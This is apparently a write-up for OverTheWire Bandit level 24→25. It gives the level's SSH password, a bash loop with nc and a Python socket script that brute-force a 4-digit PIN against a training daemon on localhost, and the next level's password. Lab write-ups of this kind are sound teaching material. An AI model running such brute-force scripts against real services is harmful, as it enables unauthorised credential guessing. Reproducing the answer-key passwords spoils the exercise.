# [Bandit Level 24 → 25](https://overthewire.org/wargames/bandit/bandit25.html)


## The Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.


## Finding the Password
##### SSH Command
```sh
sshpass -p UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ ssh bandit.labs.overthewire.org -p 2220 -l bandit24
```

---
```bash
for i in {0000..9999};do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ ${i}" >> code.txt; done
nc localhost 30002 < code.txt
```

```python
#!/usr/bin/env python3

from socket import socket, AF_INET, SOCK_STREAM

PASSWD = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

sock = socket(AF_INET, SOCK_STREAM)

try:
    sock.connect(("localhost", 30002))
    print(sock.recv(2048))

    for pincode in range(0, 10000):
        pincode = str(pincode).zfill(4)

        msg = "{passwd} {pincode}\n".format(passwd=PASSWD, pincode=pincode)
        sock.sendall(msg.encode())
        recv = sock.recv(1024)

        if "Wrong" in str(recv):
            print("{pincode} is incorrect".format(pincode=pincode))
        else:
            print("{pincode} is correct".format(pincode=pincode))
            print(recv)
            break
finally:
    sock.close()
```

> `uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG`
